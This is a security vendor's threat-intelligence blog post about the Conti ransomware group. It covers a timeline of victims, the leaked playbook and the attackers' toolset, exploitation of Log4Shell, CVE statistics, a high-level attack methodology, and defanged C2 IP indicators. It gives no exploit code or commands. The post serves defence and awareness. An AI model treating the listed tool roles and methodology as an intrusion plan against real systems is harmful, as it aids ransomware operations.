Download Ransomware Index Update Q1 2022

All About Conti

Posted on Feb 23, 2022 | Updated on May 12, 2022 | By Surojoy Gupta

Conti has been in the news consistently since August 2021, warranting a joint warning from the Cybersecurity Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA), bringing to the notice of organizations, the threat posed by the ransomware group and the vulnerabilities it exploits. 

A risk-based approach is the requirement of the moment, if organizations want to stay ahead of dangerous sophisticated ransomware groups such as Conti.

 

<button>schedule_btn</button>

 Timeline | Conti Develops Log4J Exploitation Chain

Conti’s Playbook and Tools  | Conti Attack Methodology

IOCs and MITRE Map | Interesting TrendsConti Vulnerabilities

Recent Development

Costa Rican Declares National Emergency: Costa Rican President Rodrigo Chaves declared a national emergency following cyber attacks from the Conti ransomware group on multiple government bodies. Conti ransomware revealed 672 GB of Costa Rican government entities last month. In addition, Conti threat actor "UNC1756," along with their affiliate, has solely claimed responsibility for this cyber attack rather than nation-state hackers. 

ContiLeaks: A new Twitter account named ContiLeaks posted links to an archive of Conti's internal chat messages on February 27, shortly after the Ransomware group offered support to Russia in its war against Ukraine. The leaked data also included domains used for compromises with BazarBackdoor, the malware used to access targeted networks. In addition, DHS CISA updated the Conti ransomware advisory with Indicators of Compromise (IoCs) containing over 100 domain names utilized in criminal operations. 

The ContiLeaks reveal over 30 vulnerabilities associated with the Conti ransomware, bringing the total to 44 CVEs. 

Internal chats leaked from the Conti ransomware group reveal the inner workings of the group, including details on 30 vulnerabilities exploited by the group and affiliates and specific insights into its processes after gaining entry, like how it targets Active Directory. 

 

CSW data researchers and security analysts cover the latest developments, the tools, techniques, and procedures used, as well as the vulnerabilities explored by Conti in 2021-22 in this blog. 


Who is Conti?


Conti ransomware is a ransomware-as-a-service (RaaS) operation believed to be controlled by the Russia-based cybercrime group called Wizard Spider. The ransomware shares some of its code with the infamous Ryuk Ransomware, which went off the news in July 2020. 

 

Conti-nuous Attacks Through January 2022


Conti’s prolific track record continues into 2022, with four attacks being reported within the first two months of the new year. Let us take a look at the different recent incidents involving the Conti group.
 

Ransomware Attack Incident


Time Period
 

Sector

Conti Demands

Costa Rica April 22, 2022 Finance -
Panasonic Canada April 15, 2022 HR and accounting -
Wind Turbine March 21, 2022 IT -
TrustFord April 8, 2022 Manufacturing -

Meyer Corporation

October 25, 2021 - 

February 18, 2022

Distribution

-

Kenyon Produce Snacks

February 02, 2022

Foods and Beverages

-

Delta Electronics

January 21, 2022

Manufacturing

$15 Million ransom

RR Donnelley

January 15, 2022

Marketing Agency

2.5 GB data stolen

Bank of Indonesia

December 2021 - January 2022

Banking

13.88 GB data stolen; Ransomware amount unknown

Finite Recruitment

December 2021

Government

300 GB data stolen

McMenamins Brewery

December 12, 2021

Foods and Beverages

-

Nordic Choice Hotels

December 2, 2021

Hospitality

-

Shutterfly

December 2021

E-commerce

Few million dollars in ransom

CS Energy

November 27, 2021

Energy

-

Australian Government

November 2021 - present

Government

-

Graff

October 2021

Jewelry

69000 files leaked

JVC Kenwood

September - October 2021

Manufacturing

1.7 TB data stolen, $7 Million ransom

Covisian 

September 18, 2021 

Communications Industry

-

Microsoft Exchange Servers using ProxyShell

September 3, 2021

Software

1 TB data stolen

SAC Wireless (Nokia subsidiary)

June - August 2021

Manufacturing

250GB data stolen

Stanadyne PurePower Technologies

June 2, 2021 - Present

Engineering and Technology

-

Canada

Till June 2021

Insurance

-

Canada

Till June 2021

Engineering & Technology

-

Canada

Till June 2021

Internet services

-

New Zealand Health Department

May 21, 2021 - Present

Healthcare

-

Ireland Department of Health

May 18 - Present

Healthcare

Attempt unsuccessful

Ireland Health Service Executive (HSE)

May 17 - Present

Healthcare

$20M

City of Tulsa

May 6 - Present

Government

-

Exagrid

May 4, 2021

IT

$2.6M

Broward County Public School, Florida 

March - April 2021

Education

$40M

 

Conti’s ‘Playbook’ Leak


In August 2021, a disgruntled Conti affiliate released the threat actor’s ‘playbook’ which listed out the techniques, tactics, and procedures as well as the commonly exploited vulnerabilities. 


Some vulnerabilities mentioned in the technical manual were the 2017 Microsoft Windows SMB 1.0 Server vulnerabilities, CVE-2021-34527 in Windows Print Spooler Service, and CVE-2020-1472 in Microsoft’s Active Directory Domain Controller systems, better known as the ZeroLogon exploit


The artifact also identified four Cobalt Strike server Internet Protocol (IP) addresses used by Conti actors to communicate with their command and control (C2) server. The FBI and CISA also observed that Conti actors use different Cobalt strike server IP addresses for different victims.

  • 162.244.80[.]235

  • 85.93.88[.]165

  • 185.141.63[.]120

  • 82.118.21[.]1


Here are some tools and command-line utilities routinely used by the Conti gang, and leaked by the disgruntled affiliate:

 

Tools and Command-line Utilities

Purpose Served

Cobalt Strike beacon

Gives backdoor access to compromised systems

ATERA Agent

Used for persistence in an infected network

Ngrok

Helps identify local server ports to establish a virtual tunnel to the local host for smoother data exfiltration

Rclone

Used to exfiltrate data from infected systems and backups

Armitage

Used to identify targets, exploits, and advanced post-exploitation features 

SharpView

.NET port from PowerView tool of a PowerShell-based PowerSploit offensive toolkit

SharpChrome

Used for decrypting logins and cookies on Google Chrome

SeatBelt

Used to collect system data like OS version, UAC policy, and user folders

ADFind

Active Directory query tool

PowerShell

Used to disable Windows Defender

SMBAutoBrute

Used in brute-force attacks on current domain

Kerberoasting

Using brute force to crack the hash of a Kerberos password

Mimikatz

Used for dumping passwords from memory

GMER

Used for identifying and disabling security solutions

RouterScan

Used for discovering devices on the network and for extracting passwords using an exploit or brute force

AnyDesk

Used for persistence attacks

 

Conti Leverages Log4Shell


After the discovery of the critical Log4Shell vulnerability in the Apache framework in December 2021, threat actors, including Conti began exploiting the new vulnerability, as organizations scurried to fix their unpatched systems. 


Not long after our researchers observed Conti exploiting the Log4J vulnerability,  VMware vCenter Servers were hacked. Approximately 40 VMware products were found vulnerable to the Log4j bug, and without the proprietary fixes to avoid an attack, Conti was able to use the vulnerability to move laterally through unpatched servers. The attack on VMware led Shutterfly, a photography giant, to be subsumed in a ransomware attack that affected 4000 devices and 120 VMware ESXi servers. 


In due course, Conti also became the first ransomware group to have a complete exploit chain for the Log4J Shell vulnerability, thereby raising concerns among cybersecurity professionals worldwide about a spate of supply-chain Conti attacks leveraging the critical Apache bug. 

 

Interesting Trends

Some interesting trends pertaining to the Conti ransomware group have been observed over the last year. Here is a brief overview of the trends.


1. Conti Swears Allegiance to the Russian Government

As the Russian invasion of Ukraine commenced, the Conti ransomware gang issued a statement to its adversaries in the West, not only pledging allegiance to the war efforts carried out by the Russian government, but also warning of retaliatory attacks on critical infrastructure if any nation were to oppose the war or plan cyberattacks against Russia. 

A printscreen of the Conti warning message posted by the gang members.

A printscreen of the Conti warning message posted by the gang members.


Shortly after the release of the message, Conti revised it to soften the tone and support for the Russian government. The updated warning mentions that Conti 'does not ally with any governments' and that they 'condemn the ongoing war'. 

A printscreen of the revised Conti warning message posted by the gang members.

A printscreen of the revised Conti warning message.


2. Taking over TrickBot malware operations

The Conti ransomware syndicate took over the failing TrickBot malware operations in mid-February 2022. Since TrickBot malware is detectable by antivirus vendors, the Conti gang aims to replace it with the stealthier BazarBackdoor malware, which is already in use to compromise high-value targets.  


3. SEO Poisoning attacks

On February 07, 2022, hackers conducting an SEO poisoning campaign were spotted using tools like ATERA agent, BATLOADER malware, Ursnif, and techniques very similar to those executed by the Conti Group. The hackers were attempting to infiltrate organizations through Microsoft Visual Studio 2015, Zoom, and TeamViewer, among others. 


4. Novel approach to destroy backups

Soon after the Ireland Health Service attacks in June 2021, Conti focussed their attention on developing new ways to compromise backup software developed by Veeam that is used for disaster recovery. The Conti gang uses three tools–Cobalt Strike, Atera, and Ngrok–during their infection routines and subsequently impersonate a privileged backup user to grant themselves Veeam backup privileges in order to help them destroy all backups
 

5.  Apology for Attack

The Conti ransomware gang leaked thousands of records stolen from UK-based jewelry store, Graff, during their October 2021 attacks. However, in November 2021, the hackers issued a surprising apology for their decision to leak data that included files on powerful world personalities, like the crown prince of Saudi Arabia.
 

6. Wizard Spider Partners with Shatak APT

It has been noted that the threat group ITG23 (TrickBot Gang, Wizard Spider) has been partnering with the threat group TA551 (Shatak) to distribute TrickBot and BazarBackdoor malware which are then used to deploy Conti ransomware on compromised systems. 

Shatak APT distributes email-based malware through phishing techniques. Researchers predict that the Conti gang may be using Shatak as an initial access vector.


7.  Selling Access to Victims

The Conti ransomware affiliate program seemed to have altered its tactics by offering the organizations who have refused to pay or negotiate a ransom a way to retrieve their encrypted files by selling them access to the stolen data, before putting the confidential files on the victim shaming blogs to be sold. 


8. Revival of Emotet Botnet

After law enforcement took down Emotet Botnet in early 2021, the Conti gang seem to have convinced some members of the Botnet team to revive it. Being the most widespread malware, Emotet can wreak havoc as it has done in the past, deploying Ryuk, Conti, ProLock, Egregor, DoppelPaymer, and other ransomware on exposed systems.

 

We analyzed the CVEs being exploited by the Conti group. Here is our detailed analysis:

 

  • Of the 44 vulnerabilities, three have CVSS v3 scores of 10.

  • 23 of 44 vulnerabilities have remote code execution, and privilege escalation capabilities. 

  • Seven of the 44 vulnerabilities have denial of service capabilities.

  • Eight vulnerability is categorized as a Webapp exploit and the other remaining is uncategorized.

  • 12 vulnerabilities have critical severity ratings (9.8 to 10), 30 CVEs have high severity ratings (7.2 to 8.1), and one has a medium severity rating (5.9).

  • Six vulnerabilities are categorized as improper input validation issues (CWE-20), while eight have the weakness enumeration, CWE-269 (Improper Privilege Management). 

 

Conti Attack Methodology


Looking at multiple attacks involving Conti ransomware, we have understood the following to be their overall attack vector:
 

  1. Initial Attack Vectors:

  • Social Engineering (Phishing)

  • Vulnerable Firewalls 

  • Internet-facing RDP Servers
     

  1. Privilege Escalation:

  • Gain Domain administrator privileges or equivalent

  • Disable security measures

  1. Execution:

  • Servers, endpoints, backups, sensitive data

  • Gather Live IP address and Ports

  • Dump Credentials

  • Install Backdoors and deploy C2C (for example, Cobalt Strike beacon)

  • Exfiltrate as much data as possible

  • Launch ransomware, use RCE vulnerability to distribute to all servers identified

  • Inject in Logon scripts in GPO for whenever the computer starts up and joins the domain


Conti Attack MITRE Map

Indicators of Compromise (IoCs)

 

What does the future hold? 

 
In November 2021, the Department of Homeland Security CISA released a list of known exploited vulnerabilities (KEV), containing 383 vulnerabilities as of February 2022. Of these 383 vulnerabilities, seventeen vulnerabilities have been associated with the Conti gang. 


Of the seventeen vulnerabilities exploited by Conti ransomware, eleven are part of the Department of Homeland Security CISA’s Known Exploited Vulnerabilities catalog and should be patched immediately. 


As highlighted in CSW’s Ransomware Spotlight Report 2022, vulnerabilities that were discovered in 2020 and earlier accounted for 91% of the total vulnerability count (288) as of December 2021. This emphasizes the need for periodic vulnerability management and patching to maintain good cyber hygiene.

Companies ought to seek out more effective approaches towards vulnerability management by adopting vulnerability assessment platforms that can present threat data in real-time, as well as identify, investigate and categorize vulnerabilities based on their weaponization.

Aaron Sandeen, CEO of CSW 

Adopting a risk-based approach and prioritizing critical vulnerabilities based on threat context is the need of the hour. 

 

Worried about how susceptible your organization is to a ransomware attack? 

Get a Ransomware Exposure Assessment done today! 

Click here to talk to us. 

Never miss a patch or an update with CSW’s Patch Watch Newsletter. Subscribe now!

csw

Secure your environment from cyber-attacks!

Know How

incognito